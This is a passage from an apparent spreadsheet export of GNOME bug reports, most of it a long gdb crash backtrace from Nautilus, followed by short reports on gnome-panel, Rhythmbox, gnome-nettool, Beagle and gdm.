#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x8350f18)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x8350f18
#4  0x406b1ae1 in thread_entry (cast_to_state=0x8350f18)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x8350f18
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 7 (Thread 5126 (LWP 1846)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x8372b80)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x8372b80
#4  0x406b1ae1 in thread_entry (cast_to_state=0x8372b80)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x8372b80
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 4101 (LWP 1845)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x835e9f8)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x835e9f8
#4  0x406b1ae1 in thread_entry (cast_to_state=0x835e9f8)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x835e9f8
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 1844)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x8354438)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x8354438
#4  0x406b1ae1 in thread_entry (cast_to_state=0x8354438)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x8354438
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 1843)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x8210970)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x8210970
#4  0x406b1ae1 in thread_entry (cast_to_state=0x8210970)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x8210970
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 1842)):
#0  0x409b9136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4082fa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4082bea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x406b1a9c in gnome_vfs_thread_pool_wait_for_work (state=0x813dda8)
    at gnome-vfs-thread-pool.c:155
	state = (GnomeVFSThreadState *) 0x813dda8
#4  0x406b1ae1 in thread_entry (cast_to_state=0x813dda8)
    at gnome-vfs-thread-pool.c:176
	state = (GnomeVFSThreadState *) 0x813dda8
#5  0x4082cf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 1841)):
#0  0x40a65b40 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x4082ccda in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 1838)):
#0  0x40a3b4b9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40ab330c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4083283a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401f4d35 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:620
	estatus = 1082166146
	in_segv = 1
	pid = 0
#4  0x40830307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x4007cd99 in nautilus_file_invalidate_attributes (file=0x84c82e0 
    file_attributes=0x8431c90) at nautilus-file.c:4975
	file = (NautilusFile *) 0x84c82e0
	file_attributes = (GList *) 0x8431c90
#7  0x40062771 in mime_db_changed_callback (ignore=0x82373f8
dir=0x84f7690)
    at nautilus-directory-async.c:613
	monitor = (Monitor *) 0x84c82e0
	ptr = (GList *) 0x83cd700
	attrs = (GList *) 0x8431c90
	file_list = (GList *) 0x842c320
#8  0x40808c7a in g_cclosure_marshal_VOID__VOID (closure=0x84adb68 
    return_value=0x0 n_param_values=1 param_values=0xbfffeed0 
    invocation_hint=0xbfffedd8 marshal_data=0x0) at gmarshal.c:77
	closure = (GClosure *) 0x84adb68
	param_values = (GValue *) 0xfffffe00
	callback = 0
	data1 = 0x82373f8
	data2 = 0xfffffe00
#9  0x407f3f4a in g_closure_invoke (closure=0x84adb68 return_value=0x0
    n_param_values=1 param_values=0xbfffeed0
invocation_hint=0xbfffedd8)
    at gclosure.c:437
	closure = (GClosure *) 0x84adb68
	marshal = 0x805d378 
	marshal_data = 0x0
	in_marshal = 0
#10 0x40807e4f in signal_emit_unlocked_R (node=0x8237058 detail=0 
    instance=0x82373f8 emission_return=0x0
instance_and_params=0xbfffeed0)
    at gsignal.c:2341
	continue_emission = -1073746472
	tmp = (Handler *) 0x83735e0
	handler = (Handler *) 0x83735e0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbffff400 instance = 0x82373f8 ihint = {
    signal_id = 205 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	handler_list = (Handler *) 0x83735b0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 205
	max_sequential_handler_number = 2598
	return_value_altered = 1
#11 0x408065ee in g_signal_emit_valist (instance=0x82373f8
signal_id=205 
    detail=0 var_args=0xbffff05c) at gsignal.c:2100
	signal_id = 3221221072
	instance_and_params = (GValue *) 0xbfffeed0
	stack_values = {{g_type = 136539432 data = {{v_int = 136541176 
        v_uint = 136541176 v_long = 136541176 v_ulong = 136541176 
        v_int64 = 136541176 v_uint64 = 136541176 v_float =
4.91873489e-34 
        v_double = 6.7460304304363312e-316 v_pointer = 0x82373f8} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 1084953520 data = {{v_int = -1073746152 v_uint =
3221221144 
        v_long = -1073746152 v_ulong = 3221221144 
        v_int64 = 4648764697653276440 v_uint64 = 4648764697653276440 
        v_float = -1.99948406 v_double = 631.35778808544546 
        v_pointer = 0xbfffef18} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4659839954799558656 
        v_uint64 = 4659839954799558656 v_float = 0 v_double =
3465.875 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 1082319192 
        v_uint = 1082319192 v_long = 1082319192 v_ulong = 1082319192
        v_int64 = 4659839955881877848 v_uint64 = 4659839955881877848 
        v_float = 4.09000778 v_double = 3465.8754921817854 
        v_pointer = 0x4082e158} {v_int = 135390832 v_uint = 135390832
        v_long = 135390832 v_ulong = 135390832 
        v_int64 = -4611704538190977424 v_uint64 = 13835039535518574192
        v_float = 4.39052283e-34 v_double = -1.9958877864104601 
        v_pointer = 0x811e670}}} {g_type = 1082374876 data = {{
        v_int = 140391488 v_uint = 140391488 v_long = 140391488 
        v_ulong = 140391488 v_int64 = 4659839886220473408 
        v_uint64 = 4659839886220473408 v_float = 6.68671145e-34 
        v_double = 3465.8438138426573 v_pointer = 0x85e3440} {
        v_int = -1073746104 v_uint = 3221221192 v_long = -1073746104
        v_ulong = 3221221192 v_int64 = 4648764697653276488 
        v_uint64 = 4648764697653276488 v_float = -1.99948978 
        v_double = 631.35778808545092 v_pointer = 0xbfffef48}}} {
    g_type = 1084953520 data = {{v_int = 1084952480 v_uint =
1084952480 
        v_long = 1084952480 v_ulong = 1084952480 
        v_int64 = -4611704399802462304 v_uint64 = 13835039673907089312
        v_float = 5.34565735 v_double = -1.995918514833626 
        v_pointer = 0x40ab0fa0} {v_int = 1082334674 v_uint =
1082334674 
        v_long = 1082334674 v_ulong = 1082334674 
        v_int64 = 4659839955881893330 v_uint64 = 4659839955881893330 
        v_float = 4.09739017 v_double = 3465.8754921888258 
        v_pointer = 0x40831dd2}}} {g_type = 0 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
4648592028156821504 
        v_uint64 = 4648592028156821504 v_float = 0 
        v_double = 611.7275390625 v_pointer = 0x0} {v_int =
1084961548 
        v_uint = 1084961548 v_long = 1084961548 v_ulong = 1084961548
        v_int64 = 602976850681737996 v_uint64 = 602976850681737996 
        v_float = 5.34998131 v_double = 2.2869141084711599e-268 
        v_pointer = 0x40ab330c}}} {g_type = 3221221240 data = {{
        v_int = 1082333566 v_uint = 1082333566 v_long = 1082333566 
        v_ulong = 1082333566 v_int64 = 4659839887162415486 
        v_uint64 = 4659839887162415486 v_float = 4.09686184 
        v_double = 3465.8442421883219 v_pointer = 0x4083197e} {
        v_int = 1084952480 v_uint = 1084952480 v_long = 1084952480 
        v_ulong = 1084952480 v_int64 = -4611704193644032096 
        v_uint64 = 13835039880065519520 v_float = 5.34565735 
        v_double = -1.9959642912008135 v_pointer = 0x40ab0fa0}}} {
    g_type = 1082333566 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4659839954799558656 
        v_uint64 = 4659839954799558656 v_float = 0 v_double =
3465.875 
        v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong =
0 
        v_int64 = 4650485997065207808 v_uint64 = 4650485997065207808 
        v_float = 0 v_double = 827.046875 v_pointer = 0x0}}} {g_type
= 0 
    data = {{v_int = 1084953536 v_uint = 1084953536 v_long =
1084953536 
        v_ulong = 1084953536 v_int64 = 1084953536 v_uint64 =
1084953536 
        v_float = 5.34616089 v_double = 5.3603826947158413e-315 
        v_pointer = 0x40ab13c0} {v_int = 1082374876 v_uint =
1082374876 
        v_long = 1082374876 v_ulong = 1082374876 
        v_int64 = 580954457408518876 v_uint64 = 580954457408518876 
        v_float = 4.11655998 v_double = 7.5632165656375833e-270 
        v_pointer = 0x4083badc}}} {g_type = 1084953520 data = {{
        v_int = -1073745992 v_uint = 3221221304 v_long = -1073745992
        v_ulong = 3221221304 v_int64 = 4648764697653276600 
        v_uint64 = 4648764697653276600 v_float = -1.99950314 
        v_double = 631.35778808546365 v_pointer = 0xbfffefb8} {
        v_int = 1084953520 v_uint = 1084953520 v_long = 1084953520 
        v_ulong = 1084953520 v_int64 = 4659835420399047600 
        v_uint64 = 4659835420399047600 v_float = 5.34615326 
        v_double = 3463.8129933797391 v_pointer = 0x40ab13b0}}} {
    g_type = 3221221304 data = {{v_int = 1082319192 v_uint =
1082319192 
        v_long = 1082319192 v_ulong = 1082319192 
        v_int64 = 4659839955881877848 v_uint64 = 4659839955881877848 
        v_float = 4.09000778 v_double = 3465.8754921817854 
        v_pointer = 0x4082e158} {v_int = 1084952480 v_uint =
1084952480 
        v_long = 1084952480 v_ulong = 1084952480 
        v_int64 = 4659838822013144992 v_uint64 = 4659838822013144992 
        v_float = 5.34565735 v_double = 3465.3598683792661 
        v_pointer = 0x40ab0fa0}}} {g_type = 1082308914 data = {{
        v_int = 1082374876 v_uint = 1082374876 v_long = 1082374876 
        v_ulong = 1082374876 v_int64 = 1082374876 v_uint64 =
1082374876 
        v_float = 4.11655998 v_double = 5.3476424215327914e-315 
        v_pointer = 0x4083badc} {v_int = -1073745944 v_uint =
3221221352 
        v_long = -1073745944 v_ulong = 3221221352 
        v_int64 = 4648599457376497640 v_uint64 = 4648599457376497640 
        v_float = -1.99950886 v_double = 612.57214355421911 
        v_pointer = 0xbfffefe8}}} {g_type = 0 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
-4611703713692647424 
        v_uint64 = 13835040360016904192 v_float = 0 
        v_double = -1.9960708618164062 v_pointer = 0x0} {v_int =
1082336357 
        v_uint = 1082336357 v_long = 1082336357 v_ulong = 1082336357
        v_int64 = 4659839887162418277 v_uint64 = 4659839887162418277 
        v_float = 4.09819269 v_double = 3465.8442421895911 
        v_pointer = 0x40832465}}} {g_type = 1084952480 data = {{
        v_int = -1073745928 v_uint = 3221221368 v_long = -1073745928
        v_ulong = 3221221368 v_int64 = 3221221368 v_uint64 =
3221221368 
        v_float = -1.99951077 v_double = 1.5914948155785437e-314 
        v_pointer = 0xbfffeff8} {v_int = 1084961548 v_uint =
1084961548 
        v_long = 1084961548 v_ulong = 1084961548 
        v_int64 = 580954491770843916 v_uint64 = 580954491770843916 
        v_float = 5.34998131 v_double = 7.5632454509219773e-270 
        v_pointer = 0x40ab330c}}} {g_type = 3221221400 data = {{
        v_int = 1084455341 v_uint = 1084455341 v_long = 1084455341 
        v_ulong = 1084455341 v_int64 = 74098899373 v_uint64 =
74098899373 
        v_float = 5.108603 v_double = 3.6609720574846784e-313 
        v_pointer = 0x40a379ad} {v_int = 1080798518 v_uint =
1080798518 
        v_long = 1080798518 v_ulong = 1080798518 
        v_int64 = -4611703506453418698 v_uint64 = 13835040567256132918
        v_float = 3.68244696 v_double = -1.9961168781690737 
        v_pointer = 0x406bad36}}} {g_type = 1082197198 data = {{
        v_int = 135204920 v_uint = 135204920 v_long = 135204920 
        v_ulong = 135204920 v_int64 = 4430172216 v_uint64 =
4430172216 
        v_float = 4.30515622e-34 v_double = 2.1887958970859864e-314 
        v_pointer = 0x80f1038} {v_int = 135204920 v_uint = 135204920
        v_long = 135204920 v_ulong = 135204920 
        v_int64 = 4641726248191463480 v_uint64 = 4641726248191463480 
        v_float = 4.30515622e-34 v_double = 213.79468157712995 
        v_pointer = 0x80f1038}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfffeee4
	node = (SignalNode *) 0x8237058
	i = 0
	n_params = 0
#12 0x4080686b in g_signal_emit (instance=0x82373f8 signal_id=205
detail=0)
    at gsignal.c:2144
No locals.
#13 0x406ab959 in gnome_vfs_mime_monitor_emit_data_changed
(monitor=0x82373f8)
    at gnome-vfs-mime-monitor.c:169
	monitor = (GnomeVFSMIMEMonitor *) 0x82373f8
	__t = 3221219292
	__r = 136541176
#14 0x406a9064 in gnome_vfs_mime_info_reload () at
gnome-vfs-mime-info.c:768
No locals.
#15 0x406a8ed8 in reload_if_needed () at gnome-vfs-mime-info.c:706
	now = 1029182162
	need_reload = 1
	s = {st_dev = 770 __pad1 = 0 __st_ino = 1141468 st_mode = 16832 
  st_nlink = 2 st_uid = 500 st_gid = 500 st_rdev = 0 __pad2 = 0 
  st_size = 4096 st_blksize = 4096 st_blocks = 8 st_atime =
1029182138 
  __unused1 = 0 st_mtime = 1028903702 __unused2 = 0 st_ctime =
1028903702 
  __unused3 = 0 st_ino = 1141468}
#16 0x406a93b9 in get_value_real (
    mime_type=0x82a8d68 x-directory/vfolder-desktop 
    key=0x406ba8a4 description user_hash_table=0x80ebcc0 
    system_hash_table=0x80eb9d0) at gnome-vfs-mime-info.c:914
	value = 0x80ebcc0 \v
	generic_type = 0x82a8d68 x-directory/vfolder-desktop
#17 0x406a94c3 in gnome_vfs_mime_get_value (
    mime_type=0x82a8d68 x-directory/vfolder-desktop 
    key=0x406ba8a4 description) at gnome-vfs-mime-info.c:968
No locals.
#18 0x406a62d3 in gnome_vfs_mime_get_description (
    mime_type=0x82a8d68 x-directory/vfolder-desktop)
    at gnome-vfs-mime-handlers.c:63
No locals.
#19 0x4007ba51 in get_description (file=0x84f7a40) at
nautilus-file.c:4219
	mime_type = 0x82a8d68 x-directory/vfolder-desktop
	description = 0x84f7a40 8!\b\r
#20 0x4007bbf9 in nautilus_file_get_type_as_string (file=0x84f7a40)
    at nautilus-file.c:4269
	file = (NautilusFile *) 0x84f7a40
#21 0x08070f73 in update_more_info (sidebar_title=0x82138f0)
    at nautilus-sidebar-title.c:518
	file = (NautilusFile *) 0x84f7a40
	info_string = (GString *) 0x80f24a8
	type_string = 0x17 
	component_info = 0x0
	search_string = 0x84f7a40 8!\b\r
	search_uri = 0x0
	date_modified_str = 0x84f7a40 8!\b\r
	sidebar_width = 139426368
	layout = (PangoLayout *) 0x0
#22 0x0807130c in update_all (sidebar_title=0x82138f0)
    at nautilus-sidebar-title.c:671
	sidebar_title = (NautilusSidebarTitle *) 0x82138f0
#23 0x40808c7a in g_cclosure_marshal_VOID__VOID (closure=0x83912b0 
    return_value=0x0 n_param_values=1 param_values=0xbffff500 
    invocation_hint=0xbffff408 marshal_data=0x0) at gmarshal.c:77
	closure = (GClosure *) 0x83912b0
	param_values = (GValue *) 0x17
	callback = 0
	data1 = 0x82138f0
	data2 = 0x17
#24 0x407f3f4a in g_closure_invoke (closure=0x83912b0 return_value=0x0
    n_param_values=1 param_values=0xbffff500
invocation_hint=0xbffff408)
    at gclosure.c:437
	closure = (GClosure *) 0x83912b0
	marshal = 0x805d378 
	marshal_data = 0x0
	in_marshal = 0
#25 0x40807e4f in signal_emit_unlocked_R (node=0x8213718 detail=0 
    instance=0x84f7a40 emission_return=0x0
instance_and_params=0xbffff500)
    at gsignal.c:2341
	continue_emission = -1073744888
	tmp = (Handler *) 0x839a4f8
	handler = (Handler *) 0x839a4f8
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x84f7a40 ihint = {
    signal_id = 195 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	handler_list = (Handler *) 0x839a618
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 195
	max_sequential_handler_number = 2598
	return_value_altered = 1
#26 0x408065ee in g_signal_emit_valist (instance=0x84f7a40
signal_id=195 
    detail=0 var_args=0xbffff68c) at gsignal.c:2100
	signal_id = 3221222656
	instance_and_params = (GValue *) 0xbffff500
	stack_values = {{g_type = 136394144 data = {{v_int = 139426368 
        v_uint = 139426368 v_long = 139426368 v_ulong = 139426368 
        v_int64 = 139426368 v_uint64 = 139426368 v_float =
6.24355008e-34 
        v_double = 6.888577855321931e-316 v_pointer = 0x84f7a40}
{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data
= {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}
{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data
= {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}
{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data
= {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}
{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data
= {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}
{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data
= {{
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 4648592028156821504 v_uint64 = 4648592028156821504 
        v_float = 0 v_double = 611.7275390625 v_pointer = 0x0} {v_int
= 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type =
3221222952 
    data = {{v_int = 1082334674 v_uint = 1082334674 v_long =
1082334674 
        v_ulong = 1082334674 v_int64 = 4659874367159868882 
        v_uint64 = 4659874367159868882 v_float = 4.09739017 
        v_double = 3481.5239296888258 v_pointer = 0x40831dd2} {
        v_int = 140363920 v_uint = 140363920 v_long = 140363920 
        v_ulong = 140363920 v_int64 = -4611697322640947056 
        v_uint64 = 13835046751068604560 v_float = 6.67405285e-34 
        v_double = -1.9974899603662699 v_pointer = 0x85dc890}}} {
    g_type = 1084249441 data = {{v_int = 1084953520 v_uint =
1084953520 
        v_long = 1084953520 v_ulong = 1084953520 
        v_int64 = 4659835420399047600 v_uint64 = 4659835420399047600 
        v_float = 5.34615326 v_double = 3463.8129933797391 
        v_pointer = 0x40ab13b0} {v_int = -1073744456 v_uint =
3221222840 
        v_long = -1073744456 v_ulong = 3221222840 
        v_int64 = 4648587272554280376 v_uint64 = 4648587272554280376 
        v_float = -1.99968624 v_double = 611.18688964813828 
        v_pointer = 0xbffff5b8}}} {g_type = 140363928 data = {{
        v_int = 1084953536 v_uint = 1084953536 v_long = 1084953536 
        v_ulong = 1084953536 v_int64 = -4611697252976880704 
        v_uint64 = 13835046820732670912 v_float = 5.34616089 
        v_double = -1.9975054288963605 v_pointer = 0x40ab13c0} {
        v_int = 1084246918 v_uint = 1084246918 v_long = 1084246918 
        v_ulong = 1084246918 v_int64 = 1084246918 v_uint64 =
1084246918 
        v_float = 5.00921917 v_double = 5.3568915379305108e-315 
        v_pointer = 0x40a04b86}}} {g_type = 1084953536 data = {{v_int
= 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
4648592028156821504 
        v_uint64 = 4648592028156821504 v_float = 0 
        v_double = 611.7275390625 v_pointer = 0x0} {v_int = 140363928
        v_uint = 140363928 v_long = 140363928 v_ulong = 140363928 
        v_int64 = 4642044737201490072 v_uint64 = 4642044737201490072 
        v_float = 6.67405652e-34 v_double = 222.84668367688278 
        v_pointer = 0x85dc898}}} {g_type = 3221222904 data = {{
        v_int = 1082374876 v_uint = 1082374876 v_long = 1082374876 
        v_ulong = 1082374876 v_int64 = 4659839887162456796 
        v_uint64 = 4659839887162456796 v_float = 4.11655998 
        v_double = 3465.8442422071075 v_pointer = 0x4083badc} {
        v_int = 140297096 v_uint = 140297096 v_long = 140297096 
        v_ulong = 140297096 v_int64 = -4611697047763106936 
        v_uint64 = 13835047025946444680 v_float = 6.64336877e-34 
        v_double = -1.997550995507682 v_pointer = 0x85cc388}}} {
    g_type = 1082333566 data = {{v_int = 1084953536 v_uint =
1084953536 
        v_long = 1084953536 v_ulong = 1084953536 
        v_int64 = 4659835420399047616 v_uint64 = 4659835420399047616 
        v_float = 5.34616089 v_double = 3463.8129933797463 
        v_pointer = 0x40ab13c0} {v_int = -1073744376 v_uint =
3221222920 
        v_long = -1073744376 v_ulong = 3221222920 
        v_int64 = 4648525150147311112 v_uint64 = 4648525150147311112 
        v_float = -1.99969578 v_double = 604.12438964814737 
        v_pointer = 0xbffff608}}} {g_type = 0 data = {{v_int =
1082774244 
        v_uint = 1082774244 v_long = 1082774244 v_ulong = 1082774244
        v_int64 = 1082774244 v_uint64 = 1082774244 v_float =
4.30699348 
        v_double = 5.3496155616212747e-315 v_pointer = 0x4089d2e4} {
        v_int = 1084246511 v_u</t>
  </si>
  <si>
    <t>GNOME-PANEL-114697</t>
  </si>
  <si>
    <t>random hang when using the panel</t>
  </si>
  <si>
    <t>I'm running gnome-panel 2.3.x and at seemingly random intervals
it is becoming unresponsive but no restarting. The applets
remain responsive though. I got this trace with gdb but I don't know
how useful it is:
#0  0x4207494e in malloc_consolidate () from /lib/tls/libc.so.6
#1  0x42073f99 in _int_malloc () from /lib/tls/libc.so.6
#2  0x42073a5e in calloc () from /lib/tls/libc.so.6
#3  0x40afb288 in g_malloc0 (n_bytes=892) at gmem.c:153
#4  0x40a45bbf in ORBit_alloc_tcval (tc=0x405cd9a0 num_elements=22)
    at allocators.c:282
#5  0x40a41c47 in ORBit_small_allocbuf (tc=0x8774818 length=22)
    at orbit-small.c:51
#6  0x405c90bf in Bonobo_ServerInfoList_duplicate (original=0x835ea8c)
    at bonobo-activation-server-info.c:209
#7  0x405c65eb in query_cache_lookup (query=0x8774818 
    sort_criteria=0x8774818) at bonobo-activation-activate.c:196
#8  0x405c66d0 in bonobo_activation_query (
    requirements=0x809e200 has_all (repo_ids
['IDL:Bonobo/Control:1.0'\t\t    
'IDL:GNOME/Vertigo/PanelAppletShell:1.0']) &amp;&amp; defined (panel:icon) &amp;&amp;
defined (panel:category) selection_order=0x80a583c opt_ev=0xbfffee00)
    at bonobo-activation-activate.c:262
#9  0x08078853 in recheck_applet_list (reload_data=0x854f188) at menu.c:2537
#10 0x40af8a43 in g_timeout_dispatch (source=0x83d2a88 callback=0x8774818
    user_data=0x854f188) at gmain.c:3093
#11 0x40af6436 in g_main_dispatch (context=0x80bd7e8) at gmain.c:1720
#12 0x40af7365 in g_main_context_dispatch (context=0x80bd7e8) at gmain.c:2268
#13 0x40af766b in g_main_context_iterate (context=0x80bd7e8 block=1
    dispatch=1 self=0x80ad390) at gmain.c:2349
#14 0x40af7cca in g_main_loop_run (loop=0x8158388) at gmain.c:2569
#15 0x406caeb3 in gtk_main () at gtkmain.c:1093
#16 0x080616ca in main (argc=1 argv=0xbfffefd4) at main.c:153
#17 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6</t>
  </si>
  <si>
    <t>RHYTHMBOX-338183</t>
  </si>
  <si>
    <t>Album not removed from album list when emptying an album</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) Starts from an empty library (--rhythmdb-file=/tmp/toto.xml)
2) Add a single song to the library
3) Select the artist name in the artist list (ie make sure 1 artist is not selected)
4) Right click on the song in the song list and select Remove from library
Result: 
The library is empty the artist is removed from the artist list but the album name is still listed in the album list
Expected Result:
The album list is empty.
Note:
If 1 artist is selected in the artist list the album list is correctly emptied.</t>
  </si>
  <si>
    <t>GNOME-NETTOOL-336941</t>
  </si>
  <si>
    <t>DNS lookup of text information is truncated</t>
  </si>
  <si>
    <t>Please describe the problem:
The result of performing a Text Information (TXT) DNS lookup is truncated.
Steps to reproduce:
Do a TXT lookup for the domain blueyonder.co.uk
Actual results:
The result shows up as: v=spf1
Expected results:
The actual result is: v=spf1 a:mailq1.blueyonder.co.uk ip4:195.188.0.0/16
ip4:213.48.0.0/16 ip4:80.192.0.0/14 ip4:82.32.0.0/12 ip4:62.30.0.0/15 ?all
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>BEAGLE-157334</t>
  </si>
  <si>
    <t>Mail icons are too small</t>
  </si>
  <si>
    <t>The mail icons in Best are too small relative to all the other icons.  We need
larger versions.</t>
  </si>
  <si>
    <t>tigert</t>
  </si>
  <si>
    <t>GDM-454777</t>
  </si>
  <si>
    <t>Missing MAXPATHLEN declaration</t>
  </si>
  <si>
    <t>Hi
I'm unable to build gdm from HEAD (using jhbuild).
Here's the error message:
make[2]: Entering directory `/opt/svn/gnome2/gdm2/daemon'
